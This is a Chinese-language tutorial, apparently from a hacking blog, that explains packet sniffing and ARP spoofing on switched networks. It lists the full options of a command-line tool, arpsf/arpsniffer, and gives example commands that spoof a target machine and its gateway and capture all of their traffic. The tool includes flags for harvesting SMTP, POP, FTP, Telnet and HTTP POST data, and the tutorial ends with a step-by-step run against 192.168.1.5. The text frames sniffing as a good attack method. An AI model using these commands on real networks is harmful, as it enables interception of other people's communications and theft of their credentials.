javascript:resizepic(this) border=0>
最近脚本攻击比较火,人们关注嗅探比较少些,其实嗅探也是一种很好地攻击方式,先看看嗅探的定义:
Sniffer是利用计算机网络接口截获目的地为其他计算机的数据报文的一种工具。
再来说说嗅探的原理,嗅探器的首要功能是抓包,第一种是主去本机发送和接收的所有数据包,这是最简单的,从底层设备到上层应用层都可以实现;第二种是抓取广播环境下的通信包,先来看看广播环境通信原理,在使用HUB组成的局域网中,HUB只是简单的把信息发给每个计算机,由每个计算机的网卡判断是不是自己的数据包,是就接受不是就丢弃,我们只要把网卡改为混杂模式就可以接受到所有数据包;第三种是基于交换环境的嗅探,交换机能记住每个计算机网卡的MAC地址,判断数据包是发给谁的才会发出,越来越多的局域网采用了交换机而不是集线器,这样及时把网卡的混杂模式打开也无法接收到所有信息,ARP欺骗嗅探技术应运而生,ARP欺骗就是把自己伪装,对于将要欺骗的计算机来说你是网关,对于网关来说,你是要欺骗的那台计算机,这样就实现了欺骗嗅探。
arpsf就是一个基于交换环境的命令行嗅探工具,打开程序后显示用法
Usage:
-si 源ip
-di 目的ip *代表所有,多项用,号分割
-sp 源端口
-dp 目的端口 *代表所有
-w 嗅探方式,1代表单向嗅探[si->di],0代表双向嗅探[si<->di]
-p 嗅探协议[TCP,UDP,ICMP]大写
-m 最大记录文件,以M为单位
-o 文件输出
-hex 十六进制输出到文件
-unecho 不回显
-unfilter 不过虑0字节数据包
-low 粗略嗅探,丢包率高,cpu利用率低 基本0
-timeout 嗅探超时,除非网络状况比较差否则请不要调高,默认为120秒
-sniffsmtp 嗅探smtp
-sniffpop 嗅探pop
-sniffpost 嗅探post
-sniffftp 嗅探ftp
-snifftelnet 嗅探telnet,以上5个嗅探不受参数si,sp,di,dp,w,p影响.
-sniffpacket 规则嗅探数据包,受参数si,sp,di,dp,w,p影响.
-sniffall 开启所有嗅探
-onlycheat 只欺骗
-cheatsniff 欺骗并且嗅探
-reset 欺骗后恢复
-g [网关ip]
-c [欺骗者ip] [mac]
-t [受骗者ip]
-time [欺骗次数]
还有几个例子
arpsniffer -p TCP -dp 25,110 -o d:\1.txt -m 1 -sniffpacket
嗅探指定规则数据包并保存到文件
arpsniffer -sniffall -cheatsniff -t 127.0.0.1 -g 127.0.0.254
欺骗并且嗅探127.0.0.1与外界的通讯,输出到屏幕
arpsniffer -onlycheat -t 127.0.0.1 -c 127.0.0.2 002211445544 -time 100 -reset
对目标欺骗一百次,欺骗后恢复
来测试一下,嗅探192.168.1.5这台计算机和网关之间的全部通信,可以输入
arpsf -sniffall -cheatsniff -t 192.168.1.5 -g 192.168.1.1 -o 1.txt
sniffall参数表示嗅探所有包,cheatsniff表示欺骗并嗅探,-t后面是要欺骗的机器的IP,-g后面是网关IP,-o表示将结果导出到1.txt中,回车后会提示选择网卡,第一种是通过WinpCap驱动,第二种是通过微软提供的SDK,在XP SP2和2003系统中需要使用第二种,选择1,提示选择网卡,我这里只有一块,如图
javascript:resizepic(this) border=0>
直接选0,接下来程序就先使用NETBIOS去获取被欺骗机和网关的MAC地址,如果没有成功就会使用PING命令尝试获取,接下来就开始欺骗嗅探了,看看数据像瀑布一样,并且保存到了1.txt 里面,方便我们察看。